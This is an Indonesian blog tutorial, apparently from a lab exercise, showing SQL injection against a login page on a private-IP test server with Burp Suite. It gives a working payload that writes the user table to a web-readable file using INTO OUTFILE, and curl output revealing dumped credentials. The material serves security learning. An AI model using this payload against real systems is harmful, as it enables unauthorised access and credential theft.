0

SQL Injection Level 4 [Part 2]

Selasa, 26 Februari 2013
Share this Article on :
Pada postingan sebelumnya, kita telah membahas tentang melakukan SQL Injeksi Tahap 4 menggunakan SQLmap, dan Tamper Data. Kali ini saya akan melakukan hal yang berbeda dari tutorial SQL Injeksi manapun, karena saya menggunakan tools OWASP Burpsuite. 
Target saya masih sama dari target pada postingan sebelumnya, dengan alasan yang sama, saya tidak mau membuat kerusakan pada situs milik orang lain.
IP target : 172.16.33.131
Important!!!
Tutorial ini bertujuan sebagai pembelajaran, penyalah gunaan yang membuat kerugian terhadap pihak lain di luar tanggung jawab penulis.
Preparation :
  1. Browser
  2. Burpsuite (dapat ditemukan di backtrack 5)
Walkthrough :
1. Menyiapkan burpsuite
Burpsuite dapat ditemukan di backtrack 5. Pada start menu, pilih Applications - Backtrack - Vulnerability Assessment - Web Application Assessment - Web Application Proxies - Burpsuite.
Burpsuite akan menangkap setiap paket atau data yang dikirim dari client ke server, dengan syarat client harus menggunakan proxy burpsuite. Untuk melakukan pengaturan proxy, lakukan langkah berikut:
  • Klik tab Proxy
  • Pada tab intercept,  klik "Intercept is on" sehingga menjadi "Intercept is off"
  • Pada tab options, perhatikan port burpsuite yang aktif. Kali ini saya menggunakan pengaturan umum, yaitu 8080.
  • Klik tab Target, pada tab ini semua data dan packet akan muncul.
Jangan tutup burpsuite, karena kita masih menggunakan tool ini.
2. Menyiapkan Browser
Anda bisa menggunakan browser apapun, namun dalam tutorial ini, saya menggunakan browser Mozilla Firefox. Untuk melakukan pengaturan proxy, lakukan langkah berikut:
  • Edit
  • Preferences
  • Advanced
  • Network
  • Settings
  • Pilih Manual Proxy Configuration
  • Pada http proxy, masukan 0.0.0.0
  • Para port proxy masukan 8080
  • Klik OK
3. Burpsuite Intercepting
Sekarang masukan IP 172.16.33.131 pada address bar. Kemudian login dengan
Username : admin
Password : '
Klik Login. Kemudian kembali pada burpsuite, maka akan muncul data yang berhasil dihadang (intercepted) oleh burpsuite.
4. Burpsuite In Action
Pada pembahasan sebelumnya, kita telah mengetahui, bahwa vulnerability terletak pada halaman checklogin.php. Jika anda masih bingung mengapa halaman ini memiliki vulnerability, saya sarankan anda membaca postingan sebelumnya mengenai SQL Injection Level 4 [Part 1].  Klik kanan pada bagian /checklogin.php, kemudian pilih "send to repeater".
Pada tab repeater. Perhatikan bagian
myusername=admin&mypassword='&Submit=Login
Pada pembahasan sebelumnya, kita juga sudah mengetahui bahwa parameter "mypassword" memiliki vulnerability terhadap serangan SQL Injection. Ini terlihat dari pesan:
mysql_num_rows(): supplied argument is not a valid MySQL result resource in
5. Dumping Username + Password With Burpsuite
Melakukan dumping username dan password belum pernah secepat dan semudah ini. Biasanya anda harus mencari table dan kolom yang tepat untuk mendapatkan username dan password. Namun kali ini anda hanya membutuhkan satu perintah saja. Ubah bagian:
myusername=admin&mypassword='&Submit=Login
Menjadi
myusername=admin&mypassword=' OR 1=1 INTO OUTFILE '/var/www/dump' --&Submit=Login

Jangan klik tombol GO. Untuk membuktikan bahwa username dan password berhasil di dump ke /var/www/dump, kita akan menguji keberadaan file dump pada server dengan perintah curl.
Command :
red-dragon [~] >> curl http://172.16.33.131/dump
Maka akan muncul
Command :
red-dragon [~] >> curl http://172.16.33.131/dump<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dump was not found on this server.</p><hr><address>Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 172.16.33.131 Port 80</address></body></html>
Terlihat bahwa file dump memang tidak ada (belum ada). Kemudian klik tombol go pada burpsuite. Dan lakukan pengecekan lagi dengan curl.
Command :
red-dragon [~] >> curl http://172.16.33.131/dump1 john         MyNameIsJohn2 robert      ADGAdsafdfwt4gadfga==

It's easy, isn't?


Artikel Terkait:

0 komentar:

Posting Komentar